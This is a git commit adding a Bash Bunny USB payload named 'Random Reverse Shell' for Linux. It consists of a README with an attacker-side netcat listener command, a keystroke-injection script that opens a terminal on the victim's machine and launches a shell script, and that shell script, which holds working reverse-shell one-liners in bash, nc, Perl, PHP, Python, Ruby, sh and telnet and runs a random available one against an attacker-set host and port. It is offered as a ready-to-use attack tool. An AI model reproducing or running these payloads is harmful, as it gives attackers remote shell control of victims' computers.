Linux Random Reverse Shell (#553)

1) Checks the availability of binaries on the system. 2) Builds a list of possible payloads. 3) Performs one at random.
2025-10-29 16:58:25 +00:00 · 2022-10-08 20:25:34 -04:00 · 2022-10-08 20:25:34 -04:00 · fa5dae9b11
commit fa5dae9b11
parent 5738de5e9e
3 changed files with 243 additions and 0 deletions
--- a/payloads/library/remote_access/linux_random-reverse-shell/README.md
+++ b/payloads/library/remote_access/linux_random-reverse-shell/README.md
@ -0,0 +1,32 @@
+# Random Reverse Shell
+
+- Title:         Random Reverse Shell
+- Author:        TW-D
+- Version:       1.0
+- Target:        Linux
+- Category:      Remote Access
+
+## Description
+
+1) Checks the availability of binaries on the system.
+2) Builds a list of possible payloads.
+3) Performs one at random.
+
+## Configuration
+
+From "payload.txt" change the values of the following constant :
+```bash
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly REMOTE_HOST="127.0.0.1"
+readonly REMOTE_PORT=54424
+
+```
+
+## Usage
+
+```
+hacker@hacker-computer:~$ nc -lnvvp <REMOTE_PORT>
+```
--- a/payloads/library/remote_access/linux_random-reverse-shell/payload.txt
+++ b/payloads/library/remote_access/linux_random-reverse-shell/payload.txt
@ -0,0 +1,85 @@
+#!/bin/bash
+#
+# Title:            Random Reverse Shell
+# 
+# Description:
+#                   1) Checks the availability of binaries on the system.
+#                   2) Builds a list of possible payloads.
+#                   3) Performs one at random.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Remote Access
+# Target:           Linux
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ==========
+# Ubuntu 20.04.4 LTS x86_64 (Xfce)
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Yellow quadruple blink .......................... STAGE4
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+readonly REMOTE_HOST="127.0.0.1"
+readonly REMOTE_PORT=54424
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+udisk mount
+
+######## ATTACK ########
+
+LED ATTACK
+
+Q DELAY 7000
+Q CTRL-ALT t
+Q DELAY 5000
+
+LED STAGE2
+
+Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING " chmod +x ./random_reverse-shell.sh"
+Q ENTER
+Q DELAY 1500
+
+Q STRING " \$BASH ./random_reverse-shell.sh ${REMOTE_HOST} ${REMOTE_PORT}"
+Q ENTER
+Q DELAY 3000
+
+LED STAGE4
+
+Q STRING " exit"
+Q ENTER
+Q DELAY 1000
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+udisk unmount
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0
--- a/payloads/library/remote_access/linux_random-reverse-shell/random_reverse-shell.sh
+++ b/payloads/library/remote_access/linux_random-reverse-shell/random_reverse-shell.sh
@ -0,0 +1,126 @@
+#!/bin/bash
+#
+# Title:            Random Reverse Shell
+# 
+# Description:
+#                   1) Checks the availability of binaries on the system.
+#                   2) Builds a list of possible payloads.
+#                   3) Performs one at random.
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Remote Access
+# Target:           Linux
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ==========
+# Ubuntu 20.04.4 LTS x86_64 (Xfce)
+#
+# USAGE
+# ==========
+# hacker@hacker-computer:~$ nc -lnvvp <REMOTE_PORT>
+# victim@victim-computer:~$ $BASH ./random_reverse-shell.sh <REMOTE_HOST> <REMOTE_PORT>
+#
+
+set -eo pipefail
+
+readonly REMOTE_HOST="${1}"
+
+readonly REMOTE_PORT="${2}"
+
+readonly RANDOM_FILENAME="${RANDOM}"
+
+readonly BINARIES_LIST=(
+    "/bin/bash"
+    "/bin/mkfifo"
+    "/bin/cat"
+    "/bin/nc"
+    "/bin/perl"
+    "/bin/php"
+    "/bin/python"
+    "/bin/ruby"
+    "/bin/sh"
+    "/bin/mknod"
+    "/bin/telnet"
+)
+
+readonly BASH_PAYLOAD=$(cat <<EOF
+/bin/bash -i > /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0<&1 2>&1
+EOF
+)
+
+#
+# [CTRL + c]
+#
+readonly NC_PAYLOAD=$(cat <<EOF
+/bin/mkfifo /tmp/${RANDOM_FILENAME} && /bin/cat /tmp/${RANDOM_FILENAME} | ${BASH} -i 2>&1 | /bin/nc ${REMOTE_HOST} ${REMOTE_PORT} > /tmp/${RANDOM_FILENAME}
+EOF
+)
+
+#
+# Tested on Perl v5.30.0
+# [CTRL + c]
+#
+readonly PERL_PAYLOAD=$(cat <<EOF
+/bin/perl -X -MIO -e '\$socket = new IO::Socket::INET(PeerAddr, "${REMOTE_HOST}:${REMOTE_PORT}"); STDIN->fdopen(\$socket, "r"); ($~)->fdopen(\$socket, "w"); system(\$_) while<>'
+EOF
+)
+
+#
+# Tested on PHP v7.4.3
+#
+readonly PHP_PAYLOAD=$(cat <<EOF
+/bin/php -r '\$fsockopen = fsockopen("${REMOTE_HOST}", ${REMOTE_PORT}); exec("${BASH} -i <&3 >&3 2>&3");'
+EOF
+)
+
+#
+# Tested on Python v2.7.18
+#
+readonly PYTHON_PAYLOAD=$(cat <<EOF
+/bin/python -c 'import socket, os, subprocess; tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM); tcp_socket.connect(("${REMOTE_HOST}", ${REMOTE_PORT})); os.dup2(tcp_socket.fileno(), 0); os.dup2(tcp_socket.fileno(), 1); os.dup2(tcp_socket.fileno(), 2); subprocess.call(["${BASH}", "-i"])'
+EOF
+)
+
+#
+# Tested on Ruby v2.7.0p0
+#
+readonly RUBY_PAYLOAD=$(cat <<EOF
+/bin/ruby -rsocket -e 'tcp_socket = TCPSocket.new("${REMOTE_HOST}", ${REMOTE_PORT}); while (command = tcp_socket.gets); command = (command.chomp).downcase; (command == "exit") ? break : tcp_socket.puts(\`#{command}\`) rescue nil; end; tcp_socket.close'
+EOF
+)
+
+readonly SH_PAYLOAD=$(cat <<EOF
+/bin/sh -i > /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0<&1 2>&1
+EOF
+)
+
+readonly TELNET_PAYLOAD=$(cat <<EOF
+/bin/mknod /tmp/${RANDOM_FILENAME} p && /bin/telnet ${REMOTE_HOST} ${REMOTE_PORT} 0</tmp/${RANDOM_FILENAME} | ${BASH} 1>/tmp/${RANDOM_FILENAME}
+EOF
+)
+
+set -u
+
+available_binaries=()
+
+for binary in "${BINARIES_LIST[@]}"; do
+    if command -v "${binary}" > /dev/null 2>&1; then
+        available_binaries+=("${binary}")
+    fi
+done
+
+available_payloads=()
+
+[[ "${available_binaries[*]}" =~ "/bin/bash" ]] && available_payloads+=("${BASH_PAYLOAD}") || echo ""
+[[ "${available_binaries[*]}" =~ "/bin/mkfifo" && "${available_binaries[*]}" =~ "/bin/cat" && "${available_binaries[*]}" =~ "/bin/nc" ]] && available_payloads+=("${NC_PAYLOAD}") || echo ""
+[[ "${available_binaries[*]}" =~ "/bin/perl" ]] && available_payloads+=("${PERL_PAYLOAD}") || echo ""
+[[ "${available_binaries[*]}" =~ "/bin/php" ]] && available_payloads+=("${PHP_PAYLOAD}") || echo ""
+[[ "${available_binaries[*]}" =~ "/bin/python" ]] && available_payloads+=("${PYTHON_PAYLOAD}") || echo ""
+[[ "${available_binaries[*]}" =~ "/bin/ruby" ]] && available_payloads+=("${RUBY_PAYLOAD}") || echo ""
+[[ "${available_binaries[*]}" =~ "/bin/sh" ]] && available_payloads+=("${SH_PAYLOAD}") || echo ""
+[[ "${available_binaries[*]}" =~ "/bin/mknod" && "${available_binaries[*]}" =~ "/bin/telnet" ]] && available_payloads+=("${TELNET_PAYLOAD}") || echo ""
+
+random_payload=${available_payloads[$RANDOM % "${#available_payloads[@]}"]}
+$BASH -c "${random_payload}" &